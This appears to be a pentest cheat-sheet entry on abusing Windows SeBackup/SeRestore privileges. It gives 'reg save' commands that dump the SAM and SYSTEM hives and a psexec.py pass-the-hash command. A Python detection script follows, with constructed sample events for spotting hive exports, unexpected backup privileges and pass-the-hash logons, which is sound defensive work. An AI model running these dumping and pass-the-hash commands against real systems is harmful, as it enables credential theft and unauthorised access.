
SeBackup - SeRestore

Required Privileges: Administrators - SeBackupPrivilege - SeRestorePrivilege

SeBackupPrivilege and SeRestorePrivilege allow a user to read (SeBackup) and write (SeRestore) any file on the system, ignoring the DACL in place on it. The idea behind these privileges is to let designated accounts perform backups of a system without requiring full administrative rights.

From an attacker's point of view, this is typically abused by dumping the SAM and SYSTEM registry hives in order to extract the local Administrator password hash.


SAM - SYSTEM

After verifying that we hold the required privileges, we can save the SAM and SYSTEM hives with reg save. The dumped files are then copied to our machine, where Impacket's secretsdump can extract the user password hashes from them:

reg save HKLM\sam "<Dump Output Path>\sam-reg"
reg save HKLM\system "<Dump Output Path>\system-reg"


Pass-The-Hash

With the recovered hash we can use Impacket's psexec.py to perform a Pass-The-Hash attack and gain access to the target machine. The -hashes value is given in LMHASH:NTHASH form.

psexec.py -hashes <HASH> <Username>@<IP>
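On the blue-team side, both halves of this technique leave recognisable traces: the hive export is a reg.exe process-creation event, the privilege grant shows up in the 4672 privilege list at logon, and psexec.py-style access appears as an NTLM network logon (4624, type 3) followed shortly by a service installation (7045) on the same host. The Python below is an added detection example, not part of the original note or of Impacket; the event records, the host names, the svc_backup allow-list and the 60-second correlation window are all constructed assumptions, and the field names follow the Windows Security/System/Sysmon events but may not match a given SIEM export exactly.

```python
"""Detection logic for SeBackup/SeRestore abuse and pass-the-hash style access.

Added example (not from the original note). Events are plain dicts constructed
for the example; field names mirror Windows Security / System / Sysmon fields.
"""
import re
from collections import defaultdict

# 'reg save HKLM\SAM ...' or 'HKLM\SYSTEM', with or without the .exe suffix
HIVE_DUMP_RE = re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(sam|system)\b", re.IGNORECASE)
SENSITIVE_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}
# Accounts expected to hold backup privileges (constructed allow-list for the example)
EXPECTED_BACKUP_ACCOUNTS = {"CORP\\svc_backup"}
PTH_WINDOW_SECONDS = 60  # assumed correlation window between logon and service install


def detect_hive_dump(event):
    """Process creation (Sysmon 1 / Security 4688) whose command line exports SAM or SYSTEM."""
    if event.get("EventID") not in (1, 4688):
        return None
    m = HIVE_DUMP_RE.search(event.get("CommandLine", ""))
    if not m:
        return None
    return f"hive dump: {event['User']} exported HKLM\\{m.group(1).upper()} ({event['CommandLine']})"


def detect_unexpected_backup_priv(event):
    """4672 lists privileges assigned at logon; alert when backup/restore land on an unexpected account."""
    if event.get("EventID") != 4672:
        return None
    held = set(event.get("PrivilegeList", "").split()) & SENSITIVE_PRIVS
    if not held or event["User"] in EXPECTED_BACKUP_ACCOUNTS:
        return None
    return f"backup privilege: {event['User']} logged on with {', '.join(sorted(held))}"


def detect_pth_service_install(events):
    """Correlate NTLM network logons (4624, LogonType 3) with a 7045 service install on the same host."""
    findings = []
    logons = defaultdict(list)  # host -> [(time, user, source ip)]
    for e in sorted(events, key=lambda ev: ev["Time"]):
        if e.get("EventID") == 4624 and e.get("LogonType") == 3 and e.get("AuthPackage") == "NTLM":
            logons[e["Host"]].append((e["Time"], e["User"], e.get("SourceIp", "?")))
        elif e.get("EventID") == 7045:
            for t, user, src in logons[e["Host"]]:
                if 0 <= e["Time"] - t <= PTH_WINDOW_SECONDS:
                    findings.append(
                        f"possible pass-the-hash: NTLM network logon by {user} from {src} on "
                        f"{e['Host']} followed by service install '{e['ServiceName']}'"
                    )
    return findings


def run_detections(events):
    """Apply the per-event rules in event order, then the cross-event correlation."""
    findings = []
    for e in events:
        for rule in (detect_hive_dump, detect_unexpected_backup_priv):
            hit = rule(e)
            if hit:
                findings.append(hit)
    findings.extend(detect_pth_service_install(events))
    return findings


# Constructed sample telemetry: one benign backup logon, one suspicious one, two hive exports,
# one benign reg query, one psexec-style logon/service pair, and two non-matching pairs.
SAMPLE_EVENTS = [
    {"EventID": 4672, "Time": 100, "Host": "WS01", "User": "CORP\\svc_backup",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 4672, "Time": 200, "Host": "WS01", "User": "CORP\\jdoe",
     "PrivilegeList": "SeBackupPrivilege SeChangeNotifyPrivilege"},
    {"EventID": 4688, "Time": 210, "Host": "WS01", "User": "CORP\\jdoe",
     "CommandLine": "reg save HKLM\\sam C:\\Windows\\Temp\\sam-reg"},
    {"EventID": 4688, "Time": 211, "Host": "WS01", "User": "CORP\\jdoe",
     "CommandLine": "reg save HKLM\\system C:\\Windows\\Temp\\system-reg"},
    {"EventID": 4688, "Time": 212, "Host": "WS01", "User": "CORP\\jdoe",
     "CommandLine": "reg query HKLM\\software"},
    {"EventID": 4624, "Time": 1000, "Host": "SRV01", "User": "Administrator",
     "LogonType": 3, "AuthPackage": "NTLM", "SourceIp": "10.0.0.5"},
    {"EventID": 7045, "Time": 1010, "Host": "SRV01", "ServiceName": "XoYmQkCn"},
    {"EventID": 4624, "Time": 2000, "Host": "SRV02", "User": "CORP\\jdoe",
     "LogonType": 3, "AuthPackage": "Kerberos", "SourceIp": "10.0.0.7"},
    {"EventID": 7045, "Time": 2005, "Host": "SRV02", "ServiceName": "Spooler"},
    {"EventID": 7045, "Time": 5000, "Host": "SRV01", "ServiceName": "LateSvc"},
]

if __name__ == "__main__":
    for finding in run_detections(SAMPLE_EVENTS):
        print(finding)
```

The 4672 rule only works with an allow-list of accounts that legitimately hold SeBackupPrivilege (members of Backup Operators, backup agents), so the first thing to tune is EXPECTED_BACKUP_ACCOUNTS; the hive-dump rule is the higher-confidence signal, since there is rarely a benign reason for an interactive user to export HKLM\SAM. The logon/service correlation is a heuristic: any remote service install after an NTLM logon matches, so pair it with the randomised service name and the unexpected source host before treating it as confirmed.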